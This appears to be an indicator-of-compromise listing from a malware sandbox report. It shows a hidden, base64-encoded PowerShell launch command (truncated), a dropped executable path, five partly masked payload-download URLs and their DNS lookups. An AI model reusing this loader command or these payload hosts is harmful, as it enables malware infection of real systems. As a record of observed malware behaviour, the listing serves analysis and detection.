Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABGAGwAeAByAGgAYwBmAGQAPQAnAEEAZQBwAG8AcQBhAHcAcABjAHkAcgBrACcAOwAkAFYAdwBnAHkAbwBzAGwAcwBzAGgAbgBzACAAPQAgACcANwA3ACcAOwAkAFMAbwByAHcAeAB1AHUAcQBzAD0AJwBXAHQ...
- %HOMEPATH%\77.exe
- http://www.qu#####sencialghero.com/doc/7jh1-9rlrb4j4w-6761362525/
- http://www.er###ontia.com/backup/rYkTRwX/
- http://ne#.###.netmessage.net/sdlkitj8kfd/zpKHTt/
- http://pr#####ionalfriends.in/wp-includes/FEOhoqQE/
- http://co###vents.in/wp-admin/duWKaLQ/
- DNS ASK qu#####sencialghero.com
- DNS ASK er###ontia.com
- DNS ASK ne#.###.netmessage.net
- DNS ASK pr#####ionalfriends.in
- DNS ASK co###vents.in